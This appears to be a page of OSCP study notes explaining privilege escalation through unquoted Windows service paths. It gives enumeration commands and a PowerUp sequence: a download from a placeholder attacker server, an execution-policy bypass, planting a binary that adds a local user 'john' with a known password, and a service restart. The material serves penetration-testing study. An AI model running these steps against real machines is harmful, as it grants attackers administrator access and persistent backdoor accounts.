🐲
OSCP Notes
  • 🐲OSCP Notes
  • 🐲OSCP Methodology
  • 💡Misc
    • Metasploit
    • Antivirus Evasion
    • Password attacks
    • Reverse Shells
    • Port Forwarding, Tunneling and Pivoting
      • Local Port Forwarding
      • Remote Port Forwarding
      • Dynamic Port Forwarding
      • Lingolo-ng
    • Information Gathering
      • Passive Reconnaissance
        • Whois
        • Google Dorks
        • NetCraft
        • Git Repository
      • Active Reconnaissance
        • DNS Enumeration
        • Host Discovery
        • Port scanning
        • SMTP - 25
        • SNMP
  • Linux
    • Local Enumeration
    • Local Privileges Escalation
      • Scheduled tasks
      • Password Authentication
      • Monitor Processes
      • SetUID Binaries and Capabilities
      • Sudoers
      • Kernel Exploits
  • Windows
    • 🧠Mindmap
    • 🥝Mimikatz Basics
    • Enumeration
      • External Enumeration
      • Local Enumeration
      • Active Directory
        • PowerView
    • NTLM Hashes
    • Local Privilege Escalation
      • Service Binary Hijacking
      • Service DLL Hijacking
      • Unquoted Service Paths
      • Scheduled Tasks
      • Token impersonation
      • Backup Operators Group
    • Lateral Movement
      • WMI and WinRM
      • PsExec
      • Pass The Hash
      • Overpass The Hash
      • Pass The Ticket
      • DCOM
    • Persistence
      • Golden Ticket
      • Shadow Copy
    • Authentication Attacks
      • AS-REP Roasting
      • Kerberoasting
      • Password Spray
      • Silver Ticket
      • DC Sync
    • Client Side
    • NTLM Authentication
    • Kerberos Authentication
    • Cached Credentials
  • Web attacks
    • WordPress
    • SQL Injection (SQLi)
    • Command Injection
    • Directory Traversal
    • Local File Inclusion (LFI)
    • File Upload
Powered by GitBook
On this page
  • Introduction
  • Enumeration
  • Exploit
  • Automated Process
  • References
  1. Windows
  2. Local Privilege Escalation

Unquoted Service Paths

This attack relies on windows find an executable path when it's Unquoted.

Introduction

When the service starts the CreateProcess function execute, this function receives as a parameter lpApplicationName which is used to specify the path of the binary file. If the provided path is unquoted and include space, Then the windows service will interpreted it in various ways.

For example the path C:\Program Files\program folder\binary.exe will used in the following order: 

C:\Program.exe
C:\Program Files\program.exe
C:\Program Files\program folder\binary.exe

Enumeration

Searching for vulnerable services:

Get-CimInstance -ClassName win32_service | Select Name,State,PathName
wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """

Checking permission to create files in execute paths:

icacls "<path>"

The table below describes the permissions definitions icacls results:

Mask
Permissions

F

Full access

M

Modify access

RX

Read and execute access

R

Read-only access

W

Write-only access

Exploit

The process is pretty similar to Service Binary Hijacking

Automated Process

It is possible to automate the process using well known tool called PowerUp from PowerSploit Collection:

Downloading PowerUp.ps1:

iwr -uri http://<attacker_http_server>/PowerUp.ps1 -Outfile PowerUp.ps1

Bypassing Execution Policy:

powershell -ep bypass

Importing PowerUp.ps1:

. .\PowerUp.ps1

Enumerate services with unquoted paths:

Get-UnquotedService

Exploiting by creating a malicious binary (the default behavior is to create a new local user called john with the password Password123!)

Write-ServiceBinary -Name '<service_name>' -Path "<binary_path>"

Triggering the exploit by restarting the service

Restart-Service <service_name>

References

PreviousService DLL HijackingNextScheduled Tasks

Last updated 8 months ago

PowerSploit/PowerUp.ps1 at master · PowerShellMafia/PowerSploitGitHub
Creating The Malicious Binary
Triggering the Execution
Logo
Windows-Local-Privilege-Escalation-Cookbook/Notes/UnquotedServicePath.md at master · nickvourd/Windows-Local-Privilege-Escalation-CookbookGitHub
UnquotedServicePath
Logo